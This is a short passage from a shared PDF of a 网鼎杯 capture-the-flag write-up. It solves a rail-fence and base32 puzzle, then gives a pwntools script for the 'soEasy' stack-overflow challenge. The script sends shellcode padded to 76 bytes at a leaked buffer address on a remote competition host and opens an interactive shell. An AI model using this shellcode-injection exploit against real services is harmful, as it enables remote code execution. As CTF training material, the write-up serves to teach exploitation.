网鼎杯writeup-护网先锋1
需积分: 0 159 浏览量
2022-08-04
00:48:17
上传
评论
收藏 714KB PDF 举报
“网鼎杯”网络安全大赛 WriteUp 模板
0x00 Not_only_base
操作内容:
打开文件可以看到如下字符串:MCJIJSGKP=ZZYXZXRMU=W3YZG3ZZ==G3HQHCUS==
然后使用栅栏解密,设置栏数为 4,得到
MZWGCZ33JYYHIXZQJZGHSX3CGRZUKMZSPU======
然后使用 base32 解密,得到 flag
flag{N0t_0NLy_b4sE32}
FLAG 值:
flag{N0t_0NLy_b4sE32}
0x01 soEasy
操作内容:
使用 ida 打开程序,发现存在栈溢出漏洞,使用 gdb 调试后可得如下程序:
程序代码:
from pwn import *
#p=process('./pwn222')
p=remote('106.75.95.47',42264)
shell=asm(shellcraft.sh())
p.recvuntil('->')
buf=int(p.recv(10),16)
p.sendline(shell.ljust(76,'a')+p32(buf))
p.interactive()
运行截图:
FLAG 值:
剩余17页未读,继续阅读
资源评论
